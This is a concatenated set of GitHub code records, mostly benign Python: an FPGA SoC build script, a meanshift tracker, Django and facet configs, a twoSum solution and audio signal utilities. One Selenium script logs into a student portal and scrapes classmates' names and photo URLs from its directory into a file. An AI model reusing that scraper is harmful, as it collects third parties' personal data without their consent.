1\n","repo_name":"chungl1/schoolWork","sub_path":"pythonProject/src/SeqServices.py","file_name":"SeqServices.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74549652796","text":"from luna import configure_default_logging, top_level_cli\nfrom luna.gateware.usb.usb2.device import USBDevice\n\nfrom luna_soc.gateware.soc import LunaSoC\nfrom luna_soc.gateware.csr import GpioPeripheral, LedPeripheral\n\nfrom amaranth import Elaboratable, Module, Cat\nfrom amaranth.hdl.rec import Record\n\nfrom lambdasoc.cpu.minerva import MinervaCPU\n\nimport logging\nimport os\nimport sys\n\nCLOCK_FREQUENCIES_MHZ = {\n 'sync': 60\n}\n\n# - HelloSoc ------------------------------------------------------------------\n\nclass HelloSoc(Elaboratable):\n def __init__(self, clock_frequency):\n\n # create a stand-in for our UART\n self.uart_pins = Record([\n ('rx', [('i', 1)]),\n ('tx', [('o', 1)])\n ])\n\n # create our SoC\n internal_sram_addr = 0x40000000\n internal_sram_size = 32768\n self.soc = LunaSoC(\n cpu=MinervaCPU(\n with_debug = False,\n with_icache = True,\n icache_nlines = 16,\n icache_nwords = 4,\n icache_nways = 1,\n icache_base = internal_sram_addr,\n icache_limit = internal_sram_addr + internal_sram_size,\n with_dcache = True,\n dcache_nlines = 16,\n dcache_nwords = 4,\n dcache_nways = 1,\n dcache_base = internal_sram_addr,\n dcache_limit = internal_sram_addr + internal_sram_size,\n with_muldiv = False,\n reset_address = 0x00000000,\n ),\n clock_frequency=clock_frequency,\n internal_sram_addr=internal_sram_addr,\n internal_sram_size=internal_sram_size,\n )\n\n # ... add bios and core peripherals ...\n self.soc.add_bios_and_peripherals(uart_pins=self.uart_pins)\n\n # ... add our LED peripheral, for simple output.\n self.leds = LedPeripheral()\n self.soc.add_peripheral(self.leds, addr=0xf0001000)\n\n def elaborate(self, platform):\n m = Module()\n m.submodules.soc = self.soc\n\n # generate our domain clocks/resets\n m.submodules.car = platform.clock_domain_generator(clock_frequencies=CLOCK_FREQUENCIES_MHZ)\n\n # connect up our UART\n uart_io = platform.request(\"uart\", 0)\n m.d.comb += [\n uart_io.tx.o.eq(self.uart_pins.tx),\n self.uart_pins.rx.eq(uart_io.rx)\n ]\n if hasattr(uart_io.tx, 'oe'):\n m.d.comb += uart_io.tx.oe.eq(~self.soc.uart._phy.tx.rdy),\n\n return m\n\n\n# - main ----------------------------------------------------------------------\n\nfrom luna.gateware.platform import get_appropriate_platform\n\nfrom luna_soc.generate import Generate, Introspect\n\nif __name__ == \"__main__\":\n # disable UnusedElaborable warnings\n from amaranth._unused import MustUse\n MustUse._MustUse__silence = True\n\n build_dir = os.path.join(\"build\")\n\n # configure logging\n configure_default_logging()\n logging.getLogger().setLevel(logging.DEBUG)\n\n # select platform\n platform = get_appropriate_platform()\n if platform is None:\n logging.error(\"Failed to identify a supported platform\")\n sys.exit(1)\n\n # configure clock frequency\n clock_frequency = int(platform.default_clk_frequency)\n logging.info(f\"Platform clock frequency: {clock_frequency}\")\n\n # create design\n design = HelloSoc(clock_frequency=clock_frequency)\n\n # TODO fix litex build\n thirdparty = os.path.join(build_dir, \"lambdasoc.soc.cpu/bios/3rdparty/litex\")\n if not os.path.exists(thirdparty):\n logging.info(\"Fixing build, creating output directory: {}\".format(thirdparty))\n os.makedirs(thirdparty)\n\n # build litex bios\n logging.info(\"Building bios\")\n design.soc.build(name=\"soc\",\n build_dir=build_dir,\n do_init=True)\n\n # build soc\n logging.info(\"Building soc\")\n overrides = {\n \"debug_verilog\": True,\n \"verbose\": False,\n }\n products = platform.build(design, do_program=False, build_dir=build_dir, **overrides)\n\n # log resources and prepare to generate artifacts\n Introspect(design.soc).log_resources()\n generate = Generate(design.soc)\n\n # generate: c-header and ld-script\n path = os.path.join(build_dir, \"genc\")\n if not os.path.exists(path):\n os.makedirs(path)\n\n logging.info(\"Generating c-header and ld-script: {}\".format(path))\n with open(os.path.join(path, \"resources.h\"), \"w\") as f:\n generate.c_header(platform_name=platform.name, file=f)\n with open(os.path.join(path, \"soc.ld\"), \"w\") as f:\n generate.ld_script(file=f)\n\n print(\"Build completed. Use 'make load' to load bitstream to device.\")\n\n # TODO\n #top_level_cli(design)\n","repo_name":"greatscottgadgets/luna-soc","sub_path":"examples/hello-c/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"13299053246","text":"import numpy as np\nimport cv2\n\n# divide 256 gray scale into 64 bin from 0-63\n\ndef gray_64bin():\n bin = []\n count = 0\n\n for i in range(0,64):\n while(count<4):\n bin.append(i)\n\n count = count+1\n count = 0\n\n #print(bin)\n return bin\ndef gray_32bin():\n bin = []\n count = 0\n for i in range(0,32):\n while(count<8):\n bin.append(i)\n count = count+1\n count = 0\n return bin\ndef gray_16bin():\n bin = []\n count = 0\n for i in range(0,16):\n while(count<16):\n bin.append(i)\n count = count+1\n count = 0\n return bin\n#print(gray_64bin())\n\ndef gray_bin():\n bin = []\n count = 0\n bin_num = 0\n for i in range(0,256):\n\n bin.append(i)\n #count = count+1\n #count = 0\n bin_num+=1\n #print(bin)\n return bin\n\ndef RGB_empty_hist():\n hist = []\n for i in range(0,4096):\n hist.append(0)\n #print(len(hist))\n return hist\n\n#use rgb to get hist\ndef color_hist(img):\n h = img.shape[0]\n w = img.shape[1]\n hist = RGB_empty_hist()\n band = pow(1, 2) + pow(1, 2)\n wei_c = []\n for i in range(0,h):\n for j in range(0,w):\n # 分别给红绿蓝 分成 16 个 bin\n # 再把每个红绿蓝带权重的分成4096个bin\n qr = img[i][j][0]/16\n qg = img[i][j][1]/16\n qb = img[i][j][2]/16\n q_temp = qr*239+qg*16+qb\n print(q_temp)\n q_temp = np.around(q_temp).astype(int)\n print(i)\n # 求出每个点离中心的距离作为mask\n dist = pow(i - 1, 2) + pow(j - 1, 2)\n wei = 1 - dist / band\n wei_c.append(wei)\n hist[q_temp]=hist[q_temp]+wei\n C = sum(wei_c)\n hist = [c_bin / C for c_bin in hist]\n return hist\n#print(gray_bin())\n\ndef empty_hist():\n hist = []\n for i in range(0,16):\n hist.append(0)\n #print(len(hist))\n return hist\n# 灰度图的直方图\ndef get_hist(img):\n h = img.shape[0]\n w = img.shape[1]\n #print(\"wh in hist\",w,h)\n\n bin = gray_16bin();\n hist = empty_hist()\n c_x = w/2\n c_y = h/2\n wei_c = []\n band = pow(c_x,2)+ pow(c_y,2)\n\n for col in range(0,h):\n for row in range(0,w):\n color = img[col][row]\n #print(color)\n color_bin = bin[color]\n #print(color_bin)\n dist = pow(col-c_y,2)+pow(row-c_x,2)\n wei = 1-dist/band\n wei_c.append(wei)\n hist[color_bin] = hist[color_bin] + wei\n C = sum(wei_c)\n #print('c',C)\n #normalize hist\n if C == 0:\n C = 1\n hist=[c_bin / C for c_bin in hist]\n #print(len(hist))\n return hist\n\ndef get_similarity(hist1,hist2):\n similar = []\n for i in (range(0,16)):\n if hist2[i] != 0:\n temp = hist1[i]/hist2[i]\n simi = np.sqrt(temp)\n\n similar.append(simi)\n else :\n similar.append(0)\n #print(similar)\n return similar\n\ndef meanshift_step(roi,roi_window,hist1,img):\n # 1 calculate h2\n # 2 calculate similarity\n # 3 ca/culate new center\n box_cx, box_cy, box_w, box_h = roi_window\n #print(box_w,box_h)\n #len = len(roi)\n\n len = box_h*box_w\n\n #print('roiwindow',roi_window)\n num = 0\n sim = []\n # box_cx = box.x\n # box_cy = box.y\n # box_h = box.shape[0]\n # box_w = box.shape[1]\n #x_shift = 0\n #y_shift = 0\n sum_w = 0\n # calcuate the hist2\n\n # caculate 2 simularity\n # similarity = get_similarity(hist1,hist2)\n #print(\"simi\",similarity)\n # caculate new center\n while (num < 50):\n #print(num)\n x_shift = 0\n y_shift = 0\n sum_w = 0\n\n\n #print('ce?',box_cx,box_cy)\n\n hist2 = get_hist(roi)\n bin = gray_16bin()\n\n similarity = get_similarity(hist1, hist2)\n # 测试每一步的近似度是否在变大\n\n # s_mean=np.mean(similarity)\n # sim.append(s_mean)\n #print(\"simi\", similarity)\n num = num+1\n for col in range(0, box_h):\n for row in range(0,box_w):\n color = roi[col][row]\n color_bin = bin[color]\n # 计算normalize 的 底\n sum_w = sum_w + similarity[color_bin]\n\n # version 2 老师版本\n #x_shift = row*similarity[color_bin]+x_shift\n #print(\"loop of x_shift\",x_shift)\n #y_shift = col*similarity[color_bin]+y_shift\n\n #version 1\n\n y_shift = y_shift + similarity[color_bin]*(col-box_h/2)\n x_shift = x_shift + similarity[color_bin]*(row-box_w/2)\n\n #print(\"step shift\",x_shift,y_shift)\n\n #print('before nol',x_shift,y_shift)\n #shift distance\n\n #shift version 1\n if sum_w == 0:\n sum_w = 1\n # 我们的normaleze\n y_shift = y_shift/sum_w\n x_shift = x_shift/sum_w\n\n #print(\"firstshift\", x_shift, y_shift)\n\n #print('beforeshift',box_cx,box_cy)\n #new center version 1\n\n #\n box_cx = box_cx + x_shift*1.69\n box_cy = box_cy + y_shift*1.69\n\n #老师版本的normalize\n\n # box_cx = x_shift/len\n # box_cy = y_shift/len\n\n box_cx = np.around(box_cx)\n box_cx = box_cx.astype(int)\n box_cy = np.around(box_cy)\n box_cy = box_cy.astype(int)\n #print('centerx',box_cx,box_cy)\n\n #test change x and y\n roi = img[box_cy:box_cy + box_h, box_cx:box_cx + box_w]\n\n #show\n\n # l=np.around(box_cx + box_w / 2 - 3)\n # t=np.around(box_cy - box_h / 2 + 3)\n # r=np.around(box_cx + box_w / 2 +3)\n # b=np.around(box_cy - box_h / 2 - 3)\n # #tracking way\n # print((l,t))\n # im = cv2.rectangle(img, (box_cx, box_cy), (box_cx + box_w, box_cy + box_h), 255, 2)\n # #im = cv2.rectangle(img, (l,t), (r,b), 255)\n #\n # cv2.imshow('Video', im)\n # cv2.waitKey(0)\n\n #roi = img[box_cx:box_cx + box_h, box_cy:box_cy + box_w]\n #print(roi.shape)\n\n #print(num)\n\n\n # print(\"final\",box_cx,box_cy)\n\n return box_cx,box_cy","repo_name":"TheonHuang/object_tracking","sub_path":"build_bin.py","file_name":"build_bin.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"23275571868","text":"##################\n# THIS IS JUST AN EXAMPLE OF THE FACETSPECS.PY FILE THAT YOU NEED TO CREATE IN ORDER TO\n# CONFIGURE THE FACETED BROWSER\n# \n# THE SPECS FILE NEEDS TO BE LOCATED AT THE ROOT LEVEL OF YOUR PROJECT \n# (I.E., WHERE YOU HAVE THE SETTINGS.PY FILE)\n# \n# MORE INFO AVAILABLE AT: http://www.michelepasin.org/support/djfacet/docs/configuration.html\n##################\n\n\n\nfrom myproject.mymodels import *\n\n\n\n##################\n# \n# RESULT_TYPES and FACET_GROUPS\n#\n##################\n\n\n\nfacetslist = []\n\n\n\n\n#\tlabel = interface name / uniquename = internal name / infospace: a Model or a QuerySet instance\nresult_types\t = [{\t'label' : 'Religions', \n\t\t\t\t\t\t'uniquename' : 'religions', \n\t\t\t\t\t\t'infospace' : Religion\t,\n\t\t\t\t\t\t'isdefault' : True\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\n\t\t\t\t\t {\t'label' : 'Countries', \n\t\t\t\t\t\t'uniquename' : 'country', \n\t\t\t\t\t\t'infospace' : Country,\n\t\t\t\t\t\t\t},\n\n\t\t\t\t\t]\n\t\t\t \n\nfacet_groups =\t\t[{\t'label':\t'Place facets', \n\t\t\t\t\t\t'position': 1,\n\t\t\t\t\t\t'uniquename' :\t'countrygroup', \n\t\t\t\t\t\t'default' : True , \n\t\t\t\t\t\t'bkcolor' : 'FFEEFF' } ,\n\t\t\t\t\t\t\n\t\t\t\t\t{\t'label':\t'Religion facets', \n\t\t\t\t\t\t'position': 2,\n\t\t\t\t\t\t'uniquename' :\t'religiongroup', \n\t\t\t\t\t\t'default' : True ,\n\t\t\t\t\t\t'bkcolor' : \"EEFFFF\"} ,\n\t\t\t\t\t]\n\n\n\n\n\n\n##################\n# \n# FACETS\n#\n##################\n\n\nfacetslist +=\t[ \n\n\t\t\t{\t'appearance' : {'label' : 'Region name' , \n\t\t\t\t\t\t\t\t'uniquename' : 'regionname',\n\t\t\t\t\t\t\t\t'model' : Region , \n\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__inregion__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t 'querypath' : 'inregion__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\t\t\t\n\n\n\t\t\t{\t'appearance' : {'label' : 'Region idbname' , \n\t\t\t\t\t\t\t\t'uniquename' : 'regionidbname',\n\t\t\t\t\t\t\t\t'model' : Region , \n\t\t\t\t\t\t\t\t'dbfield' : \"idbname\", \n\t\t\t\t\t\t\t\t'displayfield' : \"idbname\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'idbname',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__inregion__idbname', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t 'querypath' : 'inregion__idbname', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\n\t\t\t{\t'appearance' : {'label' : 'Country name' , \n\t\t\t\t\t\t\t\t'uniquename' : 'countryname',\n\t\t\t\t\t\t\t\t'model' : Country , \n\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# NOTE THAT THIS FACET WILL NOT WORK WITH COUNTRIES!\n\t\t\t\t\t\t\t\t# ...if it did.. it could look like this:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# {'resulttype' : 'country',\n\t\t\t\t\t\t\t\t# 'querypath' : 'name', \n\t\t\t\t\t\t\t\t# 'inversepath' : None,\n\t\t\t\t\t\t\t\t# 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t# THIS IS AN MPTT/HIERARCHICAL FACET\t\t\n\n\t\t\t\t{\t'mptt' : True,\n\t\t\t\t\t'appearance' : {'label' : 'Religion name' , \n\t\t\t\t\t\t\t\t\t'uniquename' : 'religionname',\n\t\t\t\t\t\t\t\t\t'model' : Religion , \n\t\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t\t'grouping'\t: ['religiongroup'],\n\t\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t\t} ,\n\t\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t\t 'querypath' : 'name', \n\t\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t\t 'querypath' : 'religions__name', \n\t\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t },\n\n\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t#\tend of facet_list\n\t\t\t\t\t\t\t\t]\n\n\n\n\n\n","repo_name":"lambdamusic/djfacet","sub_path":"djfacet/facetspecs_example.py","file_name":"facetspecs_example.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"23073827343","text":"from dataclasses import fields\nfrom django import forms\nfrom django.forms import ModelForm\nfrom .models import Album\n\nclass CreateAlbumForm(ModelForm):\n class Meta:\n model = Album\n fields = [\n 'name',\n 'artist',\n 'release_datetime',\n 'cost',\n 'is_approved'\n ]\n widgets = {\n 'release_datetime': forms.DateInput(format=('%m/%d/%Y'), attrs={'type':'date'}),\n }","repo_name":"TarekMGamal/Music-Platform","sub_path":"albums/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9114978875","text":"\"\"\"\r\nGiven an array of integers, return indices of the two numbers such that \r\nthey add up to a specific target.\r\n\r\nYou may assume that each input would have exactly one solution, \r\nand you may not use the same element twice.\r\n\r\n\r\nIntuition:\r\ngoal: we have to find 2 numbers in the list that make up the target.\r\nAs we pass by each elem, we store the difference in the hash table for \r\nfaster retrieval of the other pair \r\n\r\n\r\nStore the elem as the key; Store the difference as the value\r\nCheck if next number is within the Hash Table that matches the key (The next number MUST equal the DIFFERENCE when checked, otherwise edge cases like 22-11=11 would equal itself and hence the duplicate value);\r\nif so, return the value for that key.\r\n\r\n[2, 7, 11, 15], target = 22\r\n[2,7,11,15], 9\r\n\"\"\"\r\n\r\nclass Solution:\r\n def twoSum(self, nums, target):\r\n\r\n store={}\r\n for i in range(len(nums)):\r\n difference = target - nums[i]\r\n # this will avoid returnning the same value, in the edge case where elem is 11\r\n if nums[i] not in store.values():\r\n store[nums[i]] = difference\r\n else:\r\n # if the current elem(15) is equal to the difference in store\r\n # return the corresponding index from nums using the value stored in dictionary\r\n return [nums.index(difference), i]\r\n \r\n # print(store)\r\n \r\n# Solution().twoSum([2, 7, 11, 15],22)\r\nprint(Solution().twoSum([2,7,11,15],9)) ","repo_name":"ZBr14n/Algorithms-Data-Structures-in-Python","sub_path":"python files_part2/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25543330689","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 3 14:07:36 2018\n\n@author: Vincent STRAGIER\n\"\"\"\n__author__ = 'Vincent STRAGIER'\n\n# For file import\nfrom scipy.io.wavfile import read\nfrom os import listdir\nfrom os.path import isfile, join\n\n# For maths\nimport numpy as np\nimport matplotlib.mlab as mlab # To use xcorr without pyplot\n\n# Import all the files in a directory\ndef wav_import_all(directory_path):\n samples_set = []\n sampling_frequencies = []\n filenames = [f for f in listdir(directory_path) if isfile(join(directory_path, f))]\n \n for i in range(len(filenames)):\n samples = read((str(directory_path)+ \"/\" + filenames[i]))\n samples_set.append(np.array(samples[1],np.float))\n sampling_frequencies.append(np.array(samples[0],np.float))\n \n return samples_set, sampling_frequencies, filenames\n\n# Normalize samples\ndef normalize(samples):\n return np.divide(samples, np.amax(np.absolute(samples)))\n\ndef splicer(samples, width, shifting_step, frequency):\n frames = []\n \n sampling_frequency = frequency/1000\n numeric_width = abs(int(width*sampling_frequency))\n numeric_shifting_step = abs(int(shifting_step*sampling_frequency))\n test_configuration = numeric_shifting_step-numeric_width\n \n # Determine the number of iteration to apply\n if test_configuration > 0:\n number_of_iterations = (len(samples)-numeric_width)/(test_configuration)\n elif test_configuration == 0:\n number_of_iterations = len(samples)/numeric_width\n else:\n number_of_iterations = -(len(samples)-numeric_width)/(test_configuration)\n\n # Split in frames\n for j in range(int(number_of_iterations)):\n frames.append(np.split(samples, [j*numeric_shifting_step, j*numeric_shifting_step + numeric_width])[1])\n \n return frames\n\n# Return the energy of each frame\ndef signal_energy(frames):\n temp = []\n for i in range(len(frames)):\n temp.append(np.sum(np.square(frames[i])))\n return temp\n\n# xcorr without the pyplot submodule ('junk')\ndef xcorr(x, y, normed=True, detrend=mlab.detrend_none, usevlines=True, maxlags=10, **kwargs):\n Nx = len(x)\n if Nx != len(y):\n raise ValueError('x and y must be equal length')\n\n x = detrend(np.asarray(x))\n y = detrend(np.asarray(y))\n\n c = np.correlate(x, y, mode=2)\n\n if normed:\n c /= np.sqrt(np.dot(x, x) * np.dot(y, y))\n\n if maxlags is None:\n maxlags = Nx - 1\n\n if maxlags >= Nx or maxlags < 1:\n raise ValueError('maglags must be None or strictly '\n 'positive < %d' % Nx)\n\n lags = np.arange(-maxlags, maxlags + 1)\n c = c[Nx - 1 - maxlags:Nx + maxlags]\n\n return lags, c\n\n# Return the pitch on each voiced frames calculeted with numpy\ndef pitch_voiced_autocorr(frames, sampling_frequency, threshold = 0.3):\n energy_of_each_frames = signal_energy(frames)\n \n # Convert frenquencies in number of samples\n maxlag = int(sampling_frequency/50.0)\n lag_min = int(sampling_frequency/500.0)\n lag_max = int(sampling_frequency/60.0)\n \n index = []\n pitch = []\n autocorr = 0\n \n for i in range(len(energy_of_each_frames)):\n if energy_of_each_frames[i] >= threshold:\n # Compute the autocorrelation of the voiced frame with maxlag = 50 Hz\n autocorr = xcorr(frames[i], frames[i], maxlags=maxlag)[1]\n \n # Use only the upper side of the autocorrelation to compute de pitch\n upper_side = autocorr[int(len(autocorr)/2):]\n \n # Find the first peak between 60 Hz and 500 Hz\n index_ = np.argmax(upper_side[lag_min:lag_max])\n \n # Unbiase the index of the peak\n index_ += lag_min\n \n # Compute the picth frequency\n pitch.append(sampling_frequency/index_)\n # print(pitch[i])\n \n # Correct the index to display it on the full plot\n index.append(index_+int(len(autocorr)/2))\n \n else:\n # Correct the temporality of the vector\n pitch.append(0)\n index.append(0)\n \n return np.array(pitch, np.float), index\n\nif __name__ == \"__main__\":\n print(\"This script is a Python 3 module for the Signal Processing project.\")\n","repo_name":"Vincent-Stragier/Signal_Processing_MA1_FPMS_UMONS","sub_path":"ts_project_s_lib_opti.py","file_name":"ts_project_s_lib_opti.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32559716868","text":"import json\nimport os\nimport time\nimport codecs\nfrom dotenv import load_dotenv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nload_dotenv()\nusername_value = os.getenv(\"ID\")\npassword_value = os.getenv(\"PASSWORD\")\n\nfirefox_options = webdriver.FirefoxOptions()\ndriver = webdriver.Firefox(options=firefox_options)\n\ndriver.get(\"https://ges-cas.kordis.fr/login\")\n\nusername = driver.find_element(By.CSS_SELECTOR, \"input[name='username']\")\npassword = driver.find_element(By.CSS_SELECTOR, \"input[name='password']\")\n\nusername.send_keys(username_value)\npassword.send_keys(password_value)\n\ndriver.find_element(By.CSS_SELECTOR, \"input[name='submit']\").click()\n\ndriver.get(\"https://myges.fr/student/student-directory\")\n\ntime.sleep(2)\n\n\ndef planning():\n driver.get(\"https://myges.fr/student/planning-calendar\")\n\n wait = WebDriverWait(driver, 10)\n\n is_planning_present = True\n click_count = 0\n planning_data = []\n while click_count < 4 and is_planning_present:\n try:\n # Cliquez sur la flèche de droite\n driver.find_element(By.ID, \"calendar:nextMonth\").click()\n\n # Attendez que le chargement soit terminé\n wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, \"span.mg_loadingbar_text\")))\n\n # Vérifiez si l'élément spécifique est présent dans la semaine de l'emploi du temps\n planning = driver.find_elements(By.CSS_SELECTOR, \"div.fc-event-inner\")\n print(planning)\n click_count += 1\n if not len(planning) == 0:\n is_planning_present = False\n print(\"La recherche du planning a été effectuée avec succès.\")\n print(\"-------------------------------------------------\")\n\n last_end_time = \"\" # Initialisez last_end_time\n\n for element in planning:\n title_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-title\")\n time_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-time\")\n title = title_element.text.strip()\n time = time_element.text.strip()\n\n current_end_time = time.split(\" - \")[1] # Récupérer l'heure de fin du cours actuel\n\n if last_end_time and current_end_time > last_end_time:\n print() # Ajouter un espace entre les jours\n\n print(\"| {:<30} | {:<12} |\".format(title, time))\n\n last_end_time = time.split(\" - \")[\n 1] # Mettre à jour last_end_time avec l'heure de fin du cours actuel\n for element in planning:\n title_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-title\")\n time_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-time\")\n title = title_element.text.strip()\n time = time_element.text.strip()\n planning_data.append({\"Title\": title, \"Time\": time}) # Ajoutez les données du cours à la liste\n print(\"-------------------------------------------------\")\n planning_json = json.dumps(planning_data)\n\n # Imprimez la représentation JSON\n print(planning_json)\n with codecs.open(\"planning.json\", \"w\", \"utf-8\") as file:\n file.write(planning_json)\n else:\n print(\"Aucun planning n'a été trouvé dans la semaine.\")\n except Exception as e:\n print(e)\n is_planning_present = False\n break\n\ndef notes():\n driver.get(\"https://myges.fr/student/marks\")\n\n # Récupération des en-têtes de colonne\n headers = driver.find_elements(By.CSS_SELECTOR, \".mg_content table thead th\")\n\n # Récupération des valeurs des colonnes de données\n rows = driver.find_elements(By.CSS_SELECTOR, \".mg_content table tbody tr\")\n\n data_list = []\n for row in rows:\n # Création d'un dictionnaire pour stocker les valeurs de chaque ligne\n data_dict = {}\n\n # Parcours des cellules de la ligne\n cells = row.find_elements(By.CSS_SELECTOR, \"td\")\n for i, cell in enumerate(cells):\n # Vérification si l'indice dépasse la longueur des en-têtes\n if i >= len(headers):\n break\n\n # Récupération du nom d'en-tête et de la valeur de la cellule correspondante\n header = headers[i].text.strip()\n value = cell.text.strip()\n\n # Ajout de la paire clé-valeur dans le dictionnaire\n data_dict[header] = value\n\n # Ajout du dictionnaire à la liste des données\n data_list.append(data_dict)\n\n # Conversion de la liste en JSON\n notes_json = json.dumps(data_list)\n\n # Imprimer la représentation JSON\n print(notes_json)\n\n # Écriture des données JSON dans un fichier\n with codecs.open(\"notes.json\", \"w\", \"utf-8\") as file:\n file.write(notes_json)\n\n\ndef eleves():\n driver.get(\"https://myges.fr/student/student-directory\")\n\n # Récupération de tous les champs de texte dans la div\n data_list = []\n while True:\n # Parcours des champs de texte et récupération des noms et des images\n elements = driver.find_elements(By.CSS_SELECTOR, \".mg_content .mg_directory_block_container\")\n for element in elements:\n name_element = element.find_element(By.CSS_SELECTOR, \".mg_directory_text\")\n image_element = element.find_element(By.CSS_SELECTOR, \".mg_directory_container img\")\n name = name_element.text\n image_url = image_element.get_attribute(\"src\")\n data_list.append({\"name\": name, \"image\": image_url})\n\n # Recherche du bouton \"Suivant\" pour passer à la page suivante\n next_button = driver.find_element(By.CSS_SELECTOR, \".ui-paginator-next\")\n if \"ui-state-disabled\" in next_button.get_attribute(\"class\"):\n # Si le bouton \"Suivant\" est désactivé, on sort de la boucle\n break\n else:\n # Sinon, on clique sur le bouton \"Suivant\" pour passer à la page suivante\n next_button.click()\n # Attente pour laisser le temps à la page suivante de se charger\n time.sleep(2)\n\n # Conversion de la liste en JSON\n eleves_json = json.dumps(data_list, ensure_ascii=False)\n\n # Affichage de la représentation JSON\n print(eleves_json)\n\n # Écriture des données JSON dans un fichier UTF-8\n with codecs.open(\"eleves.json\", \"w\", \"utf-8\") as file:\n file.write(eleves_json)\n\n#planning()\nnotes()\n#eleves()\n\n\ndriver.quit()","repo_name":"SamEPK/pythonGes","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20800341501","text":"import math\nfrom torch.optim.lr_scheduler import MultiStepLR, _LRScheduler\nimport torch\n\n\nclass WarmupMultiStepLR(MultiStepLR):\n def __init__(self, optimizer, milestones, gamma=0.1, warmup_factor=1.0 / 3,\n warmup_iters=500, last_epoch=-1):\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n super().__init__(optimizer, milestones, gamma, last_epoch)\n\n def get_lr(self):\n if self.last_epoch <= self.warmup_iters:\n alpha = self.last_epoch / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + 